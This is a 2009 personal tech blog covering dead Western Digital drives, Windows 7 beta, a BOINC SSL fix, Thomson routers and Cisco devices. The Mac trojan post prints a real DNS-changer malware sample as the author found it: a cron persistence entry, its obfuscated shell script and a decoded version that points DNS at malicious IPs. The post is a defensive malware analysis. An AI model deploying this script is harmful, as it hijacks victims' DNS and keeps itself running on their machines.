Saturday, January 31, 2009

Do Western Digital drives suck or is it just me? Or maybe they don't?

Typical.. as noted I created a nice new system to test Windows 7 and what happens? My 250GB Western Digital drive now thinks it's name is

WDC ROM MODEL-HAWK-----

and it is 8 GB. Not that anything can see it anymore. It still in warranty but without any proof of purchase I definitely won't get squat...

In some countries I could march back in and say it's broken and they'd bend over backwards to help me. We don't really have a customer focus in retail in New Zealand.

We have a some law named the Consumer Guarantee Act but you still feel like you're asking someone if you can beat their mother up for even thinking about returning something.

Anyway this drive is broken and there are a lot of hits when you search for the phrase above. Looks like they're not the most reliable things on the planet. So I think I'll give them a wide birth for the moment...

Update a few hours later: I turned everything off for a while (this is usually a 24/7 machine) and the drive is back. Not sure how well but seems ok so far. So give that a go if you're WD drive goes weird...

Update some 18 months later...

I've had two more western digital drive die in the last few months and they were not coming back noway nohow. So in my eyes western digital have some very severe quality issues and I will not be buying any more anytime soon.

So I have two dead drives (both blue advanced format EARS models if any one is searching for "western digital dead drives are rubbish") fortunately both are backup drives but I now have no backup and my main drive is also a western digital so it's getting replaced as soon as I can get a new drive. Need to check reliability on other drive brands...

Sunday, January 18, 2009

Windows 7

Well I had my old drive that I cloned a few months ago just lying there so I was bored one Saturday morning so I tried to install Windows 7 to have a play. I wanted to upgrade my old drive but you have to be running Windows to do the upgrade and I had experimented with that Windows installation so much it didn't boot any more. Oh well clean install. Probably better...

Well..um..I like it. I still think the PC will still be running Linux more than any other OS and the Mac I still prefer the look and feel of but Windows 7 is pretty good.

It installed easily and the only two glitches were Cisco VPN (turn on Vista level in the compatibility) and Kaspersky beta AV blue screened (kl1.sys I think it was.) I'm running my favorite Avira Antivir now. That and MalwareBytes get my vote for the best in protection. I found a rouge process on the machine a while back and they were the only two that picked it up. Anyway I digress..

The new default interface is nice. Quite Mac like but still familiar to someone who has used Windows for years. The action center consolidates things nicely to keep things under control.

My old Vampire the Masquerade: Bloodlines ran fine with no compatibility settings needed. All the Steam games ran fine. I got 60 frames on the Half Life Coast test which is quite an improvement from when it was tested with Vista. It just doesn't feel slow and busy like Vista.

It's running Chrome now. My life partner Putty just did it's thing.

I guess the true test though will be what holes the bad people find in it once it becomes widespread.

Hopefully if I can install the release one over the Beta when it's out...

This doesn't happen often but I think you've got it about right Microsoft. Please don't bloat it...

BTW one small change I had to make to get it to talk to the Mac and other Samba boxes was in the Local Security Policy (in Administrative tools) you need to change Local Policies : Security Options then the Keys that start Network security: Minimum session security for NTLM SSP based (including secure RPC) clients and server to be a bit more tolerant. Turn off the 128 bit and tuen on NTLMv2. Not as secure but I'm only using it on my LAN and it has two firewalls (not including windows) between it and the Internet.

Thursday, January 15, 2009

Mac Malware / Trojan

Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OSX is pretty secure I told him but you should have AV software to stop you passing on nasties to your windows friends and colleagues.

Eat my words I did. That afternoon a phone call from another client. He had a problem with no Internet access on his wireless network but others on the network were OK. First test try a site by IP. Fine, so it's a DNS issue..

Yes..but so much more. They had a pretty basic router so monitoring was not an option. OK talk him through opening the terminal and pinging some sites. Takes a while then fails to look it up. OK lets check /etc/resolv.conf...

nameserver 85.255.114.30
nameserver 85.255.112.152
nameserver 192.168.2.5

Oh crap... two of these were not in the TCP settings. I'll let you work out which two...

Further checking...

nick@host ~ $ host 85.255.114.30
;; connection timed out; no servers could be reached
nick@host ~ $ host 85.255.112.152
Host 152.112.255.85.in-addr.arpa not found: 2(SERVFAIL)
nick@host ~ $ whois 85.255.114.30
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.255.112.0 - 85.255.127.255'

inetnum: 85.255.112.0 - 85.255.127.255
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: UKRTELE-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered


Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...

Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

Smooth... and this file looks like...

more /Library/Internet\ Plug-Ins/QuickTime.xpt
#!/bin/sh

x=`cat "$0" wc -lawk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1tr qazwsxedcr 0123456789` `echo $s2 tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi tjkd PjphajcSkjsplk okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -itjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"

It even hides itself so you can't just grep the name server addresses. Roughly translated it gives...

s1=85.255.114.30;s2=85.255.112.152;

#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil grep PrimaryService sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -lgrep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"

Simple but I guess there were nasties just waiting to be got from some websites this machine was redirected to. Very Mac specific so not a Linux trojan gone astray. I guess he fell for one of the download this codec type trojans and got this little parasite.

So although we don't have virii in the Mac world little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the safari or firefox holes are even spoof someones bank given the recent certificate bypass expoloit..

So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!

Friday, January 9, 2009

World Community Grid BOINC not uploading

This one was a bit weird. I run BOINC on one machine and all of a sudden WCG stopped uploading with things like..

[World Community Grid] Scheduler request failed: Peer certificate cannot be authenticated with known CA certificates

or another generic one about SSL error.

Turns out playing with some flags (Gentoo build controls options) I had changed curl from using OpenSSL to GnuTLS. No biggie you would have thought but it just does not work for WCG.

Recompile it using OpenSSL makes it all happy again. So if you see these errors see if your curl has openSSL listed after it when you start the boinc_client.

This is all for Linux of course :-)

Thursday, January 8, 2009

Oh yeah..Thomson routers

What were you people thinking?  Talk about counter or  un intuitive...

The best solution I found to get these things configured for  a DSL connection was to save the config to a text file and modify it and upload it.

I webbed into the Thomson router and tried to add a PPP connection.  Nope you don't permission to do that as the admin user.  WTF?

So download the config after resetting to factory and and add entries with username and password etc for the ppp  connection and upload it and it works.  So how come I can't enter the username and password in the web interface? Grrr

Don't forget to add a default route to go out the PPP interface and it's easy...

Just a weird web interface.

Bring it Cisco

Well..New Zealand is small.  I mean small small...

Cisco have new integrated service routers (88X and 86X to expand on the 87X and 85X range I guess) that do anti virus, etc etc designed for the small office SOH market by US/World standards.  That sums up about 90% of our clients.

Bring the new toys on here!  I can't wait to try new toys from Cisco that are the all in one type thing.  They supposedly block viruses, bad content, malware etc so release it first here and we'll test it.  

It would be good to have Snort integration to block bot traffic plus any other nasties. So let's hope the Cisco open source relationship can get to that stage....

So one device that plugs into the phone line and the LAN and is a firewall and does level 3 checks on content for virus, bot etc traffic.  Doing the firewall from the outside thing is easy but monitoring outbound traffic for telltale signatures or problems would be great.